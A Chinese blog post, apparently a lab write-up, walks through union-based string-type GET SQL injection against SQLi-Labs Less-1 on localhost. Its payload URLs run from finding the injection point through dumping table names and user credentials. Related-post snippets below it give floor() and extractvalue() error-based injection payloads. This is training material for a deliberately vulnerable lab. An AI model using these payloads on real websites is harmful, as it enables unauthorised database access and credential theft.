基于联合查询的字符型GET注入

已于 2022-02-18 13:56:35 修改
阅读量1.1k 收藏 3
点赞数 1
分类专栏: SQL注入 文章标签: 数据库 安全 mysql
于 2022-02-16 19:11:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/122969018
版权

1.访问SQLi-Labs网站

访问Less-1,并根据网页提示给定一个GET参数

http://127.0.0.1/sqli-labs/Less-1/?id=1

2.寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型:

http://127.0.0.1/sqli-labs/Less-1/?id=1'

运行后报错!

http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1

 运行后正常显示!

http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='2

 运行后未正常显示!

由上述结果可以判断,网站存在字符型注入点。

3.判断网站查询的字段数(有几列)

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 1 --+

正常显示!

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 2 --+

 正常显示!

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+

  正常显示!

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+

 报错!

由上述结果可以判断,网站查询的字段数为3。

4.判断网站的回显位置

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 --+

由上可看出,2,3号位可以回显!

5.获取网站当前所在数据库的库名

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,database() --+

 显示结果为security。

6.获取数据库的全部表名

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

 显示结果,users表中有id、username和 password三个字段。

8.获取users表id、username和password字段的全部值

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

1)显示第一组数据

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --+

2)显示第二组数据

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1 --+

以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。 

Z_l123
关注
专栏目录
sql注入-5floor报错注入
技术骨干小李的博客
07-20 620
对floor报错注入的基本学习
SQL 注入-基于联合查询字符GET注入
xdjxi的博客
02-16 670
实验原理 字符GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类; http:/
floor()报错注入
热门推荐
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
【web安全】——floor报错注入
Demo不是emo的博客
01-06 1万+
floor报错注入深度剖析
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 3038
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。
floor报错注入原理解析
weixin_54894046的博客
05-24 1674
报错需要满足的条件: floor()报错注入MySQL版本8.0 已失效,经过测试7.3.4nts也已失效(据说的 本人没有实践过) 注入语句中查询用到的表内数据必须>=3条 需要用到的count(*)、floor()或者ceil()、rand()、group by rand()函数详解 RAND() RAND(N) 返回一个随机浮点值 v ,范围在 0 到1 之间 (即, 其范围为 0 ≤ v ≤ 1.0)。若已指定一个整数参数 N ,则它被用作种子值,用来产生重复序列。 通俗点
SQL注入-基于联合查询的数字GET注入
weixin_46831054的博客
02-16 3665
实验原理 数字GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
数字字符GET注入
m0_64338210的博客
02-16 3119
SQL注入基于联合查询字符GET注入 实验步骤: 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站 Less-2。访问的URL为: http:/ /[靶机 IP]/sqli-labs/Less-2/ 正在上传…重新上传取消 登录后,根据网页提示,先给定一个GET参数,即: http:// [靶机IP]/sqli-labs/Less-2 /?id=1 此时页面显示 id=1的用户名Du
sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
luosaierdadi的博客
06-28 419
输入单引号,页面报错,如下图所示根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,多余的步骤不多说了,直接开始爆数据吧。注意 id=非正确值爆库payload?id=-1' union select 1,2,database() --+得到‘security’库名爆表payload?id=-1' unio
GET-ERROR based-Single quotes – String (GET基于错误的单引号字符注入) Less-1
water0diamond的博客
03-12 930
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类是否为字符串,用单引号测试,出现‘’’说明id为字符串 那么下面我们试着添加...
sql注入中的floor报错注入原理详解
哦 卷!
10-25 2673
floor()报错注入的原因是group by在向统计表插入数据时,由于rand()多次计算导致插入统计表时主键重复,从而报错。又因为报错前concat_ws()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。
SQL注入——基于报错的注入【extractvalue()】篇
最新发布
2301_76437855的博客
03-31 792
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
报错注入floor
流浪法师的博客
07-09 299
判断是除了在id=1后面加引号,还可以加引号加单括号,等等… 如:id=1’ id=1’) and ‘1’=‘1’ and ‘1’=‘2’ id=1" id=1") and ‘1’=‘1’ and ‘1’=‘2’ (1). 通过floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中
extractvalue报错注入
bangyan3903的博客
08-18 3556
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
SQL注入之floor报错注入
weixin_46133275的博客
09-08 1945
SQL注入之floor报错注入原理一、count()函数、group by二、floor()函数三、rand()函数四、报错初体验五、报错注入1、获取当前数据库2、获取当前用户六、靶场报错注入1、获取当前数据库2、获取表名3、获取字段名4、获取字段内容总结 原理 通过使用count()、floor()、rand()、group by四个条件形成主键重复的错误 count():计算满足某一条件下的行数 floor():向下取整的函数 rand():生成0~1之间的浮点数 count():group
20、注入篇—————MYSQL数据库Floor报错注入
Fly_鹏程万里
03-02 2340
通过Floor爆错数据库版本http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)...
floor报错注入总结
zwish的信安之路
06-04 1518
floor报错注入总结 floor报错注入总结: 这里其实是二次查询注入 这里在利用相关函数时,使用了两次select查询 公式: ?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(测试语句))a from information_schema.tables group by a)b 查看当...
【sql注入-报错注入1】extractvalue()函数 报错注入
07-10 3223
【报错注入】extractvalue()函数的使用
SQL注入——floor报错注入
heyingcheng的博客
03-07 362
rand()函数进行分组group by和统计count()时可能会多次执行,导致键值key重复,从而导致报错。group by子句:分组语句,常用于,结合统计函数,根据一个或多个列,对结果进行分组。floor()函数:小数向下取整。concat_ws()函数:将括号内数据用第一个字段连接起来。根据users表里面有多少行,rand()就计算多少次。根据from后面的表中有多少行,前面的函数就执行多少次。rand()函数:随机返回0~1间的小数。count()函数:汇总统计数量。随机返回0~1间的小数。
GET传输+单引号字符注入+联合查询SQL注入实验中我学到了什么
06-03
在GET传输中,参数通过URL传递给服务器,如果参数中包含特殊字符,如单引号,可能会导致SQL注入攻击。在单引号字符注入中,攻击者会在参数值中插入单引号,使得SQL语句结构被破坏,从而可以执行恶意操作。在联合查询SQL注入中,攻击者会在参数值中插入SQL语句,使得该语句与原始查询语句联合执行,从而可以获取更多的数据或者执行恶意操作。因此,在开发过程中,要注意对用户输入进行过滤和转义,避免SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值